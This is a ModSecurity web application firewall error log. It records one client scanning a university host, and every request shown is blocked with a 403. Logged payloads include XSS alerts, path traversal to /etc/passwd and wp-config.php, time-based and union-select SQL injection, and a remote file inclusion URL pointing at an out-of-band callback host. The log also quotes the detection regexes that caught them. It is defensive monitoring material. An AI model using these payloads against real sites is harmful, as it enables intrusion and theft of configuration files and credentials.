[Tue Aug 29 11:48:21.538744 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6oAAAAC"]
[Tue Aug 29 11:48:21.602761 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAkrz60AAAAC"]
[Tue Aug 29 11:48:21.723756 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAkrz7MAAAAC"]
[Tue Aug 29 11:48:22.391553 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjYrE8AAAAK"]
[Tue Aug 29 11:48:23.522224 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12EgAAAAa"]
[Tue Aug 29 11:48:23.898803 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gj34k3cwptyct3.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gj34k3cwptyct3.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAkrz7wAAAAC"]
[Tue Aug 29 11:48:27.867187 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAkxFxgAAAAV"]
[Tue Aug 29 11:48:31.649051 2023] [:error] [pid 2385] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAlRkFwAAAAx"]
[Tue Aug 29 11:48:32.354971 2023] [:error] [pid 2359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAk386IAAAAe"]
[Tue Aug 29 11:48:33.435034 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkoTjwAAAAH"]
[Tue Aug 29 11:48:35.376169 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAk2KW4AAAAb"]
[Tue Aug 29 11:48:35.401312 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAktzF8AAAAP"]
[Tue Aug 29 11:48:37.386723 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAk1w64AAAAY"]
[Tue Aug 29 11:48:37.405249 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAlL7BUAAAAq"]
[Tue Aug 29 11:48:38.403250 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAk1w7EAAAAY"]
[Tue Aug 29 11:48:40.430843 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAjtdAoAAAAX"]
[Tue Aug 29 11:48:43.420794 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAlJmb4AAAAo"]
[Tue Aug 29 11:48:43.430734 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkyx@QAAAAW"]
[Tue Aug 29 11:48:47.357631 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAlo0zAAAAAJ"]
[Tue Aug 29 11:48:49.372520 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAkqHtgAAAAM"]
[Tue Aug 29 11:48:49.373020 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAl74tMAAAAj"]
[Tue Aug 29 11:48:49.424790 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAlyrBMAAAAI"]
[Tue Aug 29 11:48:50.385259 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlUlfkAAAA0"]
[Tue Aug 29 11:48:51.371878 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAfWN8sAAAAL"]
[Tue Aug 29 11:48:52.391503 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAl4sTgAAAAf"]
[Tue Aug 29 11:48:53.365683 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAkGCZMAAAAE"]
[Tue Aug 29 11:48:54.522392 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAlM8kEAAAAs"]
[Tue Aug 29 11:48:55.363459 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAlQ3sYAAAAw"]
[Tue Aug 29 11:48:56.365534 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAk7QLkAAAAi"]
[Tue Aug 29 11:48:57.435790 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAkoTmIAAAAH"]
